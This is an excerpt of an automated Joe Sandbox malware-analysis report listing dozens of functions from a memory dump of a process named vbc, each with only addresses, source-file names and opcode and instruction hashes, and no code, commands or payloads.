                                                                                    • Opcode Fuzzy Hash: e0308ce5ee14c24fb886fb9f14b489cdec504b92c80768c2a23305a5c2b521e7
                                                                                    • Instruction Fuzzy Hash: EBC09B2F1556C189CE178F3553137E4BF65D7425D4F5D14C5D4D21F512C1144513D625
                                                                                    Function 05954DAD Relevance: .0, Instructions: 6COMMON
                                                                                    Download Yara Rule
                                                                                    Memory Dump Source
                                                                                    • Source File: 00000006.00000002.2172724945.0000000005850000.00000040.00001000.00020000.00000000.sdmp, Offset: 05850000, based on PE: true
                                                                                    Joe Sandbox IDA Plugin
                                                                                    • Snapshot File: hcaresult_6_2_5850000_vbc.jbxd
                                                                                    Similarity
                                                                                    • API ID:
                                                                                    • String ID:
                                                                                    • API String ID:
                                                                                    • Opcode ID: 648f2a62eeaad2cdbbcd5344c2cdf0ddb4d308a711b0010c13bd86b66eb1983f
                                                                                    • Instruction ID: 041cd202c1a619d508c1d33a8e35856945701e07073195517968ffc4bcced76d
                                                                                    • Opcode Fuzzy Hash: 648f2a62eeaad2cdbbcd5344c2cdf0ddb4d308a711b0010c13bd86b66eb1983f
                                                                                    • Instruction Fuzzy Hash: CAB01233312644CFD7126724CB04B5872A9FF017C0F0900F06901C9C30E6188D10E502
                                                                                    Function 058C4650 Relevance: .0, Instructions: 4COMMON
                                                                                    Download Yara Rule
                                                                                    Memory Dump Source
                                                                                    • Source File: 00000006.00000002.2172724945.0000000005850000.00000040.00001000.00020000.00000000.sdmp, Offset: 05850000, based on PE: true
                                                                                    Joe Sandbox IDA Plugin
                                                                                    • Snapshot File: hcaresult_6_2_5850000_vbc.jbxd
                                                                                    Similarity
                                                                                    • API ID:
                                                                                    • String ID:
                                                                                    • API String ID:
                                                                                    • Opcode ID: d11a881f4ee7b2f5ccef9fbf03d8be18565c2cad7675a683bb3a4c4c51b840fe
                                                                                    • Instruction ID: 2e6f84f9414146dcf09983e5a9b6d32d1cc371a63912e02617bdd8136aa959cb
                                                                                    • Opcode Fuzzy Hash: d11a881f4ee7b2f5ccef9fbf03d8be18565c2cad7675a683bb3a4c4c51b840fe
                                                                                    • Instruction Fuzzy Hash: 2E90026670151046414071584844406A16597E13013D5C115A5558560C861C8D59967A
                                                                                    Function 058C4340 Relevance: .0, Instructions: 4COMMON
                                                                                    Download Yara Rule
                                                                                    Memory Dump Source
                                                                                    • Source File: 00000006.00000002.2172724945.0000000005850000.00000040.00001000.00020000.00000000.sdmp, Offset: 05850000, based on PE: true
                                                                                    Joe Sandbox IDA Plugin
                                                                                    • Snapshot File: hcaresult_6_2_5850000_vbc.jbxd
                                                                                    Similarity
                                                                                    • API ID:
                                                                                    • String ID:
                                                                                    • API String ID:
                                                                                    • Opcode ID: 3fed0b53299b0d76dcad2cc4d004f1726a6bc66ba5abe4b3f75c83e8f242a1f7
                                                                                    • Instruction ID: 2ec687c182b35b2679de832b889812a9075ece3542d80deb6649aef055979654
                                                                                    • Opcode Fuzzy Hash: 3fed0b53299b0d76dcad2cc4d004f1726a6bc66ba5abe4b3f75c83e8f242a1f7
                                                                                    • Instruction Fuzzy Hash: CF900236705810169140715848C4546816597E0301B95C011E5428554C8A188E5A5772
                                                                                    Function 058C2DB0 Relevance: .0, Instructions: 4COMMON
                                                                                    Download Yara Rule
                                                                                    Memory Dump Source
                                                                                    • Source File: 00000006.00000002.2172724945.0000000005850000.00000040.00001000.00020000.00000000.sdmp, Offset: 05850000, based on PE: true
                                                                                    Joe Sandbox IDA Plugin
                                                                                    • Snapshot File: hcaresult_6_2_5850000_vbc.jbxd
                                                                                    Similarity
                                                                                    • API ID:
                                                                                    • String ID:
                                                                                    • API String ID:
                                                                                    • Opcode ID: 209c3dbdae1fe2655472281dc881d932bea8ce12f349c4fb6f0cd73a384f5f30
                                                                                    • Instruction ID: bbf8ba88a1fb274a59711b18a01f4ca5c61e453653b30b8a8368fd4fb861e519
                                                                                    • Opcode Fuzzy Hash: 209c3dbdae1fe2655472281dc881d932bea8ce12f349c4fb6f0cd73a384f5f30
                                                                                    • Instruction Fuzzy Hash: FE90023634141406D14171584444606416997D0241FD5C012A5428554E86598F5AAE72
                                                                                    Function 058C2DD0 Relevance: .0, Instructions: 4COMMON
                                                                                    Download Yara Rule
                                                                                    Memory Dump Source
                                                                                    • Source File: 00000006.00000002.2172724945.0000000005850000.00000040.00001000.00020000.00000000.sdmp, Offset: 05850000, based on PE: true
                                                                                    Joe Sandbox IDA Plugin
                                                                                    • Snapshot File: hcaresult_6_2_5850000_vbc.jbxd
                                                                                    Similarity
                                                                                    • API ID:
                                                                                    • String ID:
                                                                                    • API String ID:
                                                                                    • Opcode ID: 9afe19f98d1744c6beb7c23f8d3e80d49b7f399c1cfe7910cc161b7223909a95
                                                                                    • Instruction ID: 80777464f571585b228dbded3418b91e4379c2ed1bde3d19b9f7f16d6d64267c
                                                                                    • Opcode Fuzzy Hash: 9afe19f98d1744c6beb7c23f8d3e80d49b7f399c1cfe7910cc161b7223909a95
                                                                                    • Instruction Fuzzy Hash: C0900226342451565545B1584444507816697E02417D5C012A6418950C852A9D5ADA32
                                                                                    Function 058C2D00 Relevance: .0, Instructions: 4COMMON
                                                                                    Download Yara Rule
                                                                                    Memory Dump Source
                                                                                    • Source File: 00000006.00000002.2172724945.0000000005850000.00000040.00001000.00020000.00000000.sdmp, Offset: 05850000, based on PE: true
                                                                                    Joe Sandbox IDA Plugin
                                                                                    • Snapshot File: hcaresult_6_2_5850000_vbc.jbxd
                                                                                    Similarity
                                                                                    • API ID:
                                                                                    • String ID:
                                                                                    • API String ID:
                                                                                    • Opcode ID: 26836ee523dd6df65d0daf59526ba70a3f8ec7978359f8ffc2b4fdc09c2f4dd8
                                                                                    • Instruction ID: 6eee2d5bd513c969c15747496f5de73b317ab35cf18f2912cf08b23457f3e30f
                                                                                    • Opcode Fuzzy Hash: 26836ee523dd6df65d0daf59526ba70a3f8ec7978359f8ffc2b4fdc09c2f4dd8
                                                                                    • Instruction Fuzzy Hash: 7290022630545446D10075585448A06416587D0205F95D011A6068595DC6398D55A532
                                                                                    Function 058C2D10 Relevance: .0, Instructions: 4COMMONLIBRARYCODE
                                                                                    Download Yara Rule
                                                                                    Memory Dump Source
                                                                                    • Source File: 00000006.00000002.2172724945.0000000005850000.00000040.00001000.00020000.00000000.sdmp, Offset: 05850000, based on PE: true
                                                                                    Joe Sandbox IDA Plugin
                                                                                    • Snapshot File: hcaresult_6_2_5850000_vbc.jbxd
                                                                                    Similarity
                                                                                    • API ID:
                                                                                    • String ID:
                                                                                    • API String ID:
                                                                                    • Opcode ID: dc4ebe19312d6cfb1172918c24592d4d254a05ff4b0b85bc1421c37cfd1d4dc7
                                                                                    • Instruction ID: 7af9602417d6e23a4bbf4406c33290eaaf3951b048b3285e28e4960dd63e3798
                                                                                    • Opcode Fuzzy Hash: dc4ebe19312d6cfb1172918c24592d4d254a05ff4b0b85bc1421c37cfd1d4dc7
                                                                                    • Instruction Fuzzy Hash: E890022E31341006D1807158544860A416587D1202FD5D415A5019558CC9198D6D5732
                                                                                    Function 058C2D30 Relevance: .0, Instructions: 4COMMONLIBRARYCODE
                                                                                    Download Yara Rule
                                                                                    Memory Dump Source
                                                                                    • Source File: 00000006.00000002.2172724945.0000000005850000.00000040.00001000.00020000.00000000.sdmp, Offset: 05850000, based on PE: true
                                                                                    Joe Sandbox IDA Plugin
                                                                                    • Snapshot File: hcaresult_6_2_5850000_vbc.jbxd
                                                                                    Similarity
                                                                                    • API ID:
                                                                                    • String ID:
                                                                                    • API String ID:
                                                                                    • Opcode ID: c0f7a5ae9733c5e02e84f17b2614ada2aedc4482680a1318921a33729a2f8ee1
                                                                                    • Instruction ID: cdb26f6e227286b0473984a3b44261aa9c250de689be34566b23059fff1747fb
                                                                                    • Opcode Fuzzy Hash: c0f7a5ae9733c5e02e84f17b2614ada2aedc4482680a1318921a33729a2f8ee1
                                                                                    • Instruction Fuzzy Hash: D790022630141007D140715854586068165D7E1301F95D011E5418554CD9198D5A5633
                                                                                    Function 058C2CA0 Relevance: .0, Instructions: 4COMMON
                                                                                    Download Yara Rule
                                                                                    Memory Dump Source
                                                                                    • Source File: 00000006.00000002.2172724945.0000000005850000.00000040.00001000.00020000.00000000.sdmp, Offset: 05850000, based on PE: true
                                                                                    Joe Sandbox IDA Plugin
                                                                                    • Snapshot File: hcaresult_6_2_5850000_vbc.jbxd
                                                                                    Similarity
                                                                                    • API ID:
                                                                                    • String ID:
                                                                                    • API String ID:
                                                                                    • Opcode ID: eeda772e3cd2e19724e297ce48c04bd1c2bc7314ecec749fba322a717390e4d8
                                                                                    • Instruction ID: a78c4f149e33e8fed33722ac680547a12f99f960477c9d5f2fe9fb26a12dbc11
                                                                                    • Opcode Fuzzy Hash: eeda772e3cd2e19724e297ce48c04bd1c2bc7314ecec749fba322a717390e4d8
                                                                                    • Instruction Fuzzy Hash: 2490023630141406D10075985448646416587E0301F95D011AA028555EC6698D956532
                                                                                    Function 058C2CC0 Relevance: .0, Instructions: 4COMMONLIBRARYCODE
                                                                                    Download Yara Rule
                                                                                    Memory Dump Source
                                                                                    • Source File: 00000006.00000002.2172724945.0000000005850000.00000040.00001000.00020000.00000000.sdmp, Offset: 05850000, based on PE: true
                                                                                    Joe Sandbox IDA Plugin
                                                                                    • Snapshot File: hcaresult_6_2_5850000_vbc.jbxd
                                                                                    Similarity
                                                                                    • API ID:
                                                                                    • String ID:
                                                                                    • API String ID:
                                                                                    • Opcode ID: e183e4e52adc8fa6cc299f104d89f3f846638613e77cff123355728ec6adb47c
                                                                                    • Instruction ID: 133d57a36cd9653ea4ff71393fe248b320ab727ce5aac701d2a297a408a00bcb
                                                                                    • Opcode Fuzzy Hash: e183e4e52adc8fa6cc299f104d89f3f846638613e77cff123355728ec6adb47c
                                                                                    • Instruction Fuzzy Hash: BA90022670541406D14071585458706417587D0201F95D011A5028554DC65D8F596AB2
                                                                                    Function 058C2CF0 Relevance: .0, Instructions: 4COMMON
                                                                                    Download Yara Rule
                                                                                    Memory Dump Source
                                                                                    • Source File: 00000006.00000002.2172724945.0000000005850000.00000040.00001000.00020000.00000000.sdmp, Offset: 05850000, based on PE: true
                                                                                    Joe Sandbox IDA Plugin
                                                                                    • Snapshot File: hcaresult_6_2_5850000_vbc.jbxd
                                                                                    Similarity
                                                                                    • API ID:
                                                                                    • String ID:
                                                                                    • API String ID:
                                                                                    • Opcode ID: 27fb6bb6c562e58551f8b886ea042f89610ffd7f5bfbd3895f7d36a7617e0862
                                                                                    • Instruction ID: 8654dfbd9b569d95c42a966f1d4d6c7c21f5678f39e8c196197a6d2c0e2ededa
                                                                                    • Opcode Fuzzy Hash: 27fb6bb6c562e58551f8b886ea042f89610ffd7f5bfbd3895f7d36a7617e0862
                                                                                    • Instruction Fuzzy Hash: 0A90023630141407D10071585548707416587D0201F95D411A5428558DD65A8D556532
                                                                                    Function 058C2C60 Relevance: .0, Instructions: 4COMMON
                                                                                    Download Yara Rule
                                                                                    Memory Dump Source
                                                                                    • Source File: 00000006.00000002.2172724945.0000000005850000.00000040.00001000.00020000.00000000.sdmp, Offset: 05850000, based on PE: true
                                                                                    Joe Sandbox IDA Plugin
                                                                                    • Snapshot File: hcaresult_6_2_5850000_vbc.jbxd
                                                                                    Similarity
                                                                                    • API ID:
                                                                                    • String ID:
                                                                                    • API String ID:
                                                                                    • Opcode ID: 961bc3d9715fb290119fa1602693e438510b45ab36fa92d7e690c0ca4f5c30f1
                                                                                    • Instruction ID: 55a711580d31ed4bd4e8fbb2e0bea262d9e730a930e72696261648cf3c60bf43
                                                                                    • Opcode Fuzzy Hash: 961bc3d9715fb290119fa1602693e438510b45ab36fa92d7e690c0ca4f5c30f1
                                                                                    • Instruction Fuzzy Hash: 9790023630141846D10071584444B46416587E0301F95C016A5128654D8619CD557932
                                                                                    Function 058C2F90 Relevance: .0, Instructions: 4COMMON
                                                                                    Download Yara Rule
                                                                                    Memory Dump Source
                                                                                    • Source File: 00000006.00000002.2172724945.0000000005850000.00000040.00001000.00020000.00000000.sdmp, Offset: 05850000, based on PE: true
                                                                                    Joe Sandbox IDA Plugin
                                                                                    • Snapshot File: hcaresult_6_2_5850000_vbc.jbxd
                                                                                    Similarity
                                                                                    • API ID:
                                                                                    • String ID:
                                                                                    • API String ID:
                                                                                    • Opcode ID: 4a17654a6321a0cc2ba598ff2ec38de161320b4e67402765cea242c09379b42a
                                                                                    • Instruction ID: a8a76ef46d38429bb5c85e5a3792ae1eda3d38ed171d4570baa7b98a744dcbc8
                                                                                    • Opcode Fuzzy Hash: 4a17654a6321a0cc2ba598ff2ec38de161320b4e67402765cea242c09379b42a
                                                                                    • Instruction Fuzzy Hash: AA90023630181406D1007158485470B416587D0302F95C011A6168555D86298D556972
                                                                                    Function 058C2FA0 Relevance: .0, Instructions: 4COMMON
                                                                                    Download Yara Rule
                                                                                    Memory Dump Source
                                                                                    • Source File: 00000006.00000002.2172724945.0000000005850000.00000040.00001000.00020000.00000000.sdmp, Offset: 05850000, based on PE: true
                                                                                    Joe Sandbox IDA Plugin
                                                                                    • Snapshot File: hcaresult_6_2_5850000_vbc.jbxd
                                                                                    Similarity
                                                                                    • API ID:
                                                                                    • String ID:
                                                                                    • API String ID:
                                                                                    • Opcode ID: b46793656bd7f9ece788d764032921c3c7d3de558608bd967484929fc71e96cc
                                                                                    • Instruction ID: 63bec600236497022134753adea615de5efaef7c3534b29272ab9fbe87ef28f0
                                                                                    • Opcode Fuzzy Hash: b46793656bd7f9ece788d764032921c3c7d3de558608bd967484929fc71e96cc
                                                                                    • Instruction Fuzzy Hash: 4290023630181406D10071584848747416587D0302F95C011AA168555E8669CD956932
                                                                                    Function 058C2FB0 Relevance: .0, Instructions: 4COMMON
                                                                                    Download Yara Rule
                                                                                    Memory Dump Source
                                                                                    • Source File: 00000006.00000002.2172724945.0000000005850000.00000040.00001000.00020000.00000000.sdmp, Offset: 05850000, based on PE: true
                                                                                    Joe Sandbox IDA Plugin
                                                                                    • Snapshot File: hcaresult_6_2_5850000_vbc.jbxd
                                                                                    Similarity
                                                                                    • API ID:
                                                                                    • String ID:
                                                                                    • API String ID:
                                                                                    • Opcode ID: d63f4be8c60775769f3516f110aa29124d84b6dc79767254e7f454016cad6a3d
                                                                                    • Instruction ID: 35196ec29855047fd303dfa2815cd6001acebc040e89584b407f942967f90691
                                                                                    • Opcode Fuzzy Hash: d63f4be8c60775769f3516f110aa29124d84b6dc79767254e7f454016cad6a3d
                                                                                    • Instruction Fuzzy Hash: 99900226701410464140716888849068165ABE1211795C121A599C550D855D8D695A76
                                                                                    Function 058C2FE0 Relevance: .0, Instructions: 4COMMON
                                                                                    Download Yara Rule
                                                                                    Memory Dump Source
                                                                                    • Source File: 00000006.00000002.2172724945.0000000005850000.00000040.00001000.00020000.00000000.sdmp, Offset: 05850000, based on PE: true
                                                                                    Joe Sandbox IDA Plugin
                                                                                    • Snapshot File: hcaresult_6_2_5850000_vbc.jbxd
                                                                                    Similarity
                                                                                    • API ID:
                                                                                    • String ID:
                                                                                    • API String ID:
                                                                                    • Opcode ID: d2644c6b4443046650c47c2c080b73b53564acf3a08a86f190b325d317345303
                                                                                    • Instruction ID: 076d06649f0bb863efb2c68677fe0ad041fefa780b13b3217dce8012c366944a
                                                                                    • Opcode Fuzzy Hash: d2644c6b4443046650c47c2c080b73b53564acf3a08a86f190b325d317345303
                                                                                    • Instruction Fuzzy Hash: 6D900226311C1046D20075684C54B07416587D0303F95C115A5158554CC9198D655932
                                                                                    Function 058C2F30 Relevance: .0, Instructions: 4COMMONLIBRARYCODE
                                                                                    Download Yara Rule
                                                                                    Memory Dump Source
                                                                                    • Source File: 00000006.00000002.2172724945.0000000005850000.00000040.00001000.00020000.00000000.sdmp, Offset: 05850000, based on PE: true
                                                                                    Joe Sandbox IDA Plugin
                                                                                    • Snapshot File: hcaresult_6_2_5850000_vbc.jbxd
                                                                                    Similarity
                                                                                    • API ID:
                                                                                    • String ID:
                                                                                    • API String ID:
                                                                                    • Opcode ID: f6c5cd487278b31fa7f5143ef70cb375d9e98bea623c0ebc7680537c7958106b
                                                                                    • Instruction ID: 2c7ff88f4bd3b78df9bc7978d92964115453eace1cbc3e6afb88059d8e3dca52
                                                                                    • Opcode Fuzzy Hash: f6c5cd487278b31fa7f5143ef70cb375d9e98bea623c0ebc7680537c7958106b
                                                                                    • Instruction Fuzzy Hash: 8490026634141446D10071584454B064165C7E1301F95C015E6068554D861DCD566537
                                                                                    Function 058C2F60 Relevance: .0, Instructions: 4COMMON
                                                                                    Download Yara Rule
                                                                                    Memory Dump Source
                                                                                    • Source File: 00000006.00000002.2172724945.0000000005850000.00000040.00001000.00020000.00000000.sdmp, Offset: 05850000, based on PE: true
                                                                                    Joe Sandbox IDA Plugin
                                                                                    • Snapshot File: hcaresult_6_2_5850000_vbc.jbxd
                                                                                    Similarity
                                                                                    • API ID:
                                                                                    • String ID:
                                                                                    • API String ID:
                                                                                    • Opcode ID: 6389ecd4f5c8bcda582862703dfd0c178ab596fe48012416f4265f6a34798306
                                                                                    • Instruction ID: 6f1977711fdf9236d4c52d9bd34bc22c56445acf8c8da7e6de7cfc7de8306834
                                                                                    • Opcode Fuzzy Hash: 6389ecd4f5c8bcda582862703dfd0c178ab596fe48012416f4265f6a34798306
                                                                                    • Instruction Fuzzy Hash: 9F90026631141046D1047158444470641A587E1201F95C012A7158554CC52D8D655536
                                                                                    Function 058C2E80 Relevance: .0, Instructions: 4COMMON
                                                                                    Download Yara Rule
                                                                                    Memory Dump Source
                                                                                    • Source File: 00000006.00000002.2172724945.0000000005850000.00000040.00001000.00020000.00000000.sdmp, Offset: 05850000, based on PE: true
                                                                                    Joe Sandbox IDA Plugin
                                                                                    • Snapshot File: hcaresult_6_2_5850000_vbc.jbxd
                                                                                    Similarity
                                                                                    • API ID:
                                                                                    • String ID:
                                                                                    • API String ID:
                                                                                    • Opcode ID: f5d1b57e2db00607125fe2443a23e01bf439023e63bcd20d30844185ba43dcbb
                                                                                    • Instruction ID: e73fe5ccc357356f5cac764e49ebc56a20e155419506f5fdde94e9e8e7bb17d0
                                                                                    • Opcode Fuzzy Hash: f5d1b57e2db00607125fe2443a23e01bf439023e63bcd20d30844185ba43dcbb
                                                                                    • Instruction Fuzzy Hash: B590022670141506D10171584444616416A87D0241FD5C022A6028555ECA298E96A532
                                                                                    Function 058C2EA0 Relevance: .0, Instructions: 4COMMON
                                                                                    Download Yara Rule
                                                                                    Memory Dump Source
                                                                                    • Source File: 00000006.00000002.2172724945.0000000005850000.00000040.00001000.00020000.00000000.sdmp, Offset: 05850000, based on PE: true
                                                                                    Joe Sandbox IDA Plugin
                                                                                    • Snapshot File: hcaresult_6_2_5850000_vbc.jbxd
                                                                                    Similarity
                                                                                    • API ID:
                                                                                    • String ID:
                                                                                    • API String ID:
                                                                                    • Opcode ID: 57bdc23524c0d6cd8405ae590895bd537270e6fc0682abea0a71e8baa524ef30
                                                                                    • Instruction ID: f10a36b35e1ac487c77c9605fd577e34a3e73a504781c10bf26aa296ee6269f1
                                                                                    • Opcode Fuzzy Hash: 57bdc23524c0d6cd8405ae590895bd537270e6fc0682abea0a71e8baa524ef30
                                                                                    • Instruction Fuzzy Hash: 5790027630141406D14071584444746416587D0301F95C011AA068554E865D8ED96A76
                                                                                    Function 058C2EE0 Relevance: .0, Instructions: 4COMMON
                                                                                    Download Yara Rule
                                                                                    Memory Dump Source
                                                                                    • Source File: 00000006.00000002.2172724945.0000000005850000.00000040.00001000.00020000.00000000.sdmp, Offset: 05850000, based on PE: true
                                                                                    Joe Sandbox IDA Plugin
                                                                                    • Snapshot File: hcaresult_6_2_5850000_vbc.jbxd
                                                                                    Similarity
                                                                                    • API ID:
                                                                                    • String ID:
                                                                                    • API String ID:
                                                                                    • Opcode ID: 7af47f74db09e85ebe3c2a2ee3e88d83f96a25e6acb18a92858958298792f658
                                                                                    • Instruction ID: bdd0160877ca3c05706b614ff8ee1dc0ded489c3953f809c3a662e32ea34b1be
                                                                                    • Opcode Fuzzy Hash: 7af47f74db09e85ebe3c2a2ee3e88d83f96a25e6acb18a92858958298792f658
                                                                                    • Instruction Fuzzy Hash: 8790026630181407D14075584844607416587D0302F95C011A7068555E8A2D8D556536
                                                                                    Function 058C2E30 Relevance: .0, Instructions: 4COMMON
                                                                                    Download Yara Rule
                                                                                    Memory Dump Source
                                                                                    • Source File: 00000006.00000002.2172724945.0000000005850000.00000040.00001000.00020000.00000000.sdmp, Offset: 05850000, based on PE: true
                                                                                    Joe Sandbox IDA Plugin
                                                                                    • Snapshot File: hcaresult_6_2_5850000_vbc.jbxd
                                                                                    Similarity
                                                                                    • API ID:
                                                                                    • String ID:
                                                                                    • API String ID:
                                                                                    • Opcode ID: f931ddd4a364afc13b9c6047e31db8fc0d9fb86475ba5d13028db5da5e17ccf3
                                                                                    • Instruction ID: 7f2fc765ab6f0fe78d9a201fe1979d7612ea8817c95a3a6ca5148352f6ec221c
                                                                                    • Opcode Fuzzy Hash: f931ddd4a364afc13b9c6047e31db8fc0d9fb86475ba5d13028db5da5e17ccf3
                                                                                    • Instruction Fuzzy Hash: 4790022630141406D102715844546064169C7D1345FD5C012E6428555D86298E57A533
                                                                                    Function 058C2B80 Relevance: .0, Instructions: 4COMMON
                                                                                    Download Yara Rule
                                                                                    Memory Dump Source
                                                                                    • Source File: 00000006.00000002.2172724945.0000000005850000.00000040.00001000.00020000.00000000.sdmp, Offset: 05850000, based on PE: true
                                                                                    Joe Sandbox IDA Plugin
                                                                                    • Snapshot File: hcaresult_6_2_5850000_vbc.jbxd
                                                                                    Similarity
                                                                                    • API ID:
                                                                                    • String ID:
                                                                                    • API String ID:
                                                                                    • Opcode ID: 408635c266067271b3f05d23bf1c799e74ef107286ac5219f4c22b30e4320779
                                                                                    • Instruction ID: 1fa0ffa6be2c4802569d8444a158983cd65fb459e0d4debff1013a3faa00a1c7
                                                                                    • Opcode Fuzzy Hash: 408635c266067271b3f05d23bf1c799e74ef107286ac5219f4c22b30e4320779
                                                                                    • Instruction Fuzzy Hash: 4A90023630141806D10471584844686416587D0301F95C011AB028655E96698D957532
                                                                                    Function 058C2BA0 Relevance: .0, Instructions: 4COMMON
                                                                                    Download Yara Rule
                                                                                    Memory Dump Source
                                                                                    • Source File: 00000006.00000002.2172724945.0000000005850000.00000040.00001000.00020000.00000000.sdmp, Offset: 05850000, based on PE: true
                                                                                    Joe Sandbox IDA Plugin
                                                                                    • Snapshot File: hcaresult_6_2_5850000_vbc.jbxd
                                                                                    Similarity
                                                                                    • API ID:
                                                                                    • String ID:
                                                                                    • API String ID:
                                                                                    • Opcode ID: 4fa80dbad05db6722f3871421930f135550f36eafdde21d5c043699fc8208888
                                                                                    • Instruction ID: 4fd6bf1631be82dff9306ece0a15ef12c2be6c5cadc597450738a4491543d63f
                                                                                    • Opcode Fuzzy Hash: 4fa80dbad05db6722f3871421930f135550f36eafdde21d5c043699fc8208888
                                                                                    • Instruction Fuzzy Hash: 6090023670541806D15071584454746416587D0301F95C011A5028654D87598F597AB2
                                                                                    Function 058C2BE0 Relevance: .0, Instructions: 4COMMON
                                                                                    Download Yara Rule
                                                                                    Memory Dump Source
                                                                                    • Source File: 00000006.00000002.2172724945.0000000005850000.00000040.00001000.00020000.00000000.sdmp, Offset: 05850000, based on PE: true
                                                                                    Joe Sandbox IDA Plugin
                                                                                    • Snapshot File: hcaresult_6_2_5850000_vbc.jbxd
                                                                                    Similarity
                                                                                    • API ID:
                                                                                    • String ID:
                                                                                    • API String ID:
                                                                                    • Opcode ID: 5c7368f3e9d12d93b40a012e3231dd9a8c7cf31a52981e59568102b787a85e24
                                                                                    • Instruction ID: 09dfcaff3c26619f44f0f0698c112113010e2361b0cfae6764f4b555a6dd72eb
                                                                                    • Opcode Fuzzy Hash: 5c7368f3e9d12d93b40a012e3231dd9a8c7cf31a52981e59568102b787a85e24
                                                                                    • Instruction Fuzzy Hash: B290023630545846D14071584444A46417587D0305F95C011A5068694D96298E59BA72
                                                                                    Function 058C2BF0 Relevance: .0, Instructions: 4COMMONLIBRARYCODE
                                                                                    Download Yara Rule
                                                                                    Memory Dump Source
                                                                                    • Source File: 00000006.00000002.2172724945.0000000005850000.00000040.00001000.00020000.00000000.sdmp, Offset: 05850000, based on PE: true
                                                                                    Joe Sandbox IDA Plugin
                                                                                    • Snapshot File: hcaresult_6_2_5850000_vbc.jbxd
                                                                                    Similarity
                                                                                    • API ID:
                                                                                    • String ID:
                                                                                    • API String ID:
                                                                                    • Opcode ID: 0ca2c2960879e5dae6fbb0942ee1fc23d81d3cb67c19c92ba7a3819770c611c7
                                                                                    • Instruction ID: 949777aa5ca4a8a589c69ef097c4084df54cd823a200bdf9c1b724e87721edf2
                                                                                    • Opcode Fuzzy Hash: 0ca2c2960879e5dae6fbb0942ee1fc23d81d3cb67c19c92ba7a3819770c611c7
                                                                                    • Instruction Fuzzy Hash: 4790023630141806D1807158444464A416587D1301FD5C015A5029654DCA198F5D7BB2
                                                                                    Function 058C2AB0 Relevance: .0, Instructions: 4COMMONLIBRARYCODE
                                                                                    Download Yara Rule
                                                                                    Memory Dump Source
                                                                                    • Source File: 00000006.00000002.2172724945.0000000005850000.00000040.00001000.00020000.00000000.sdmp, Offset: 05850000, based on PE: true
                                                                                    Joe Sandbox IDA Plugin
                                                                                    • Snapshot File: hcaresult_6_2_5850000_vbc.jbxd
                                                                                    Similarity
                                                                                    • API ID:
                                                                                    • String ID:
                                                                                    • API String ID:
                                                                                    • Opcode ID: c05e7b037d4959e42e3f00c8426eac82a8dbb26dce750c2e8d0068f82de73810
                                                                                    • Instruction ID: e7219ba8c2d2a48c5a3eb8896d64a3a7d355f047cfa1208903dc1444de1b5000
                                                                                    • Opcode Fuzzy Hash: c05e7b037d4959e42e3f00c8426eac82a8dbb26dce750c2e8d0068f82de73810
                                                                                    • Instruction Fuzzy Hash: E59002A6301550964500B2588444B0A866587E0201B95C016E6058560CC5298D559536
                                                                                    Function 058C2AD0 Relevance: .0, Instructions: 4COMMON
                                                                                    Download Yara Rule
                                                                                    Memory Dump Source
                                                                                    • Source File: 00000006.00000002.2172724945.0000000005850000.00000040.00001000.00020000.00000000.sdmp, Offset: 05850000, based on PE: true
                                                                                    Joe Sandbox IDA Plugin
                                                                                    • Snapshot File: hcaresult_6_2_5850000_vbc.jbxd
                                                                                    Similarity
                                                                                    • API ID:
                                                                                    • String ID:
                                                                                    • API String ID:
                                                                                    • Opcode ID: 032d788cf3a5234144e0f9db3a149d3987f943d63ff93e14b74c513b81475c19
                                                                                    • Instruction ID: 2aadb0db10ad88967ee73f35420036ff6bdb5c42ea3b23cd7a4c14c6d85b5beb
                                                                                    • Opcode Fuzzy Hash: 032d788cf3a5234144e0f9db3a149d3987f943d63ff93e14b74c513b81475c19
                                                                                    • Instruction Fuzzy Hash: D890022A311410070105B558074450741A687D5351395C021F6019550CD6258D655532
                                                                                    Function 058C2AF0 Relevance: .0, Instructions: 4COMMON
                                                                                    Download Yara Rule
                                                                                    Memory Dump Source
                                                                                    • Source File: 00000006.00000002.2172724945.0000000005850000.00000040.00001000.00020000.00000000.sdmp, Offset: 05850000, based on PE: true
                                                                                    Joe Sandbox IDA Plugin
                                                                                    • Snapshot File: hcaresult_6_2_5850000_vbc.jbxd
                                                                                    Similarity
                                                                                    • API ID:
                                                                                    • String ID:
                                                                                    • API String ID:
                                                                                    • Opcode ID: 94a691114064afd3b06f4a7249f037653bb0ce1c10124f33504767564478e7fc
                                                                                    • Instruction ID: c3b277522ea9d2cb8ccd21fae58bece0b9f8373de8f20d1b1a2f0ed5f248d638
                                                                                    • Opcode Fuzzy Hash: 94a691114064afd3b06f4a7249f037653bb0ce1c10124f33504767564478e7fc
                                                                                    • Instruction Fuzzy Hash: 4690022A321410060145B558064450B45A597D63513D5C015F641A590CC6258D695732
                                                                                    Function 058C3090 Relevance: .0, Instructions: 4COMMON
                                                                                    Download Yara Rule
                                                                                    Memory Dump Source
                                                                                    • Source File: 00000006.00000002.2172724945.0000000005850000.00000040.00001000.00020000.00000000.sdmp, Offset: 05850000, based on PE: true
                                                                                    Joe Sandbox IDA Plugin
                                                                                    • Snapshot File: hcaresult_6_2_5850000_vbc.jbxd
                                                                                    Similarity
                                                                                    • API ID:
                                                                                    • String ID:
                                                                                    • API String ID:
                                                                                    • Opcode ID: 5b418f04a9624884d0c3089e638a98fe60b678fc92c10adae7a7b8e7b6a94eae
                                                                                    • Instruction ID: 51aa7cbec82f51ea1649aaa853018375080d1ee04428e18d8104b867b310b787
                                                                                    • Opcode Fuzzy Hash: 5b418f04a9624884d0c3089e638a98fe60b678fc92c10adae7a7b8e7b6a94eae
                                                                                    • Instruction Fuzzy Hash: 6690022634141806D140715884547074166C7D0601F95C011A5028554D861A8E696AB2
                                                                                    Function 058C3010 Relevance: .0, Instructions: 4COMMON
                                                                                    Download Yara Rule
                                                                                    Memory Dump Source
                                                                                    • Source File: 00000006.00000002.2172724945.0000000005850000.00000040.00001000.00020000.00000000.sdmp, Offset: 05850000, based on PE: true
                                                                                    Joe Sandbox IDA Plugin
                                                                                    • Snapshot File: hcaresult_6_2_5850000_vbc.jbxd
                                                                                    Similarity
                                                                                    • API ID:
                                                                                    • String ID:
                                                                                    • API String ID:
                                                                                    • Opcode ID: a53312e665549d0922273fa7b9a2a13ac30312692fa8d6f67664e893106d3f57
                                                                                    • Instruction ID: 4e7b2f5286d81bdb9c8427ab383059ba07aeb67e7e59ddfb18627e64fd96ad95
                                                                                    • Opcode Fuzzy Hash: a53312e665549d0922273fa7b9a2a13ac30312692fa8d6f67664e893106d3f57
                                                                                    • Instruction Fuzzy Hash: F790022630185446D14072584844B0F826587E1202FD5C019A915A554CC9198D595B32
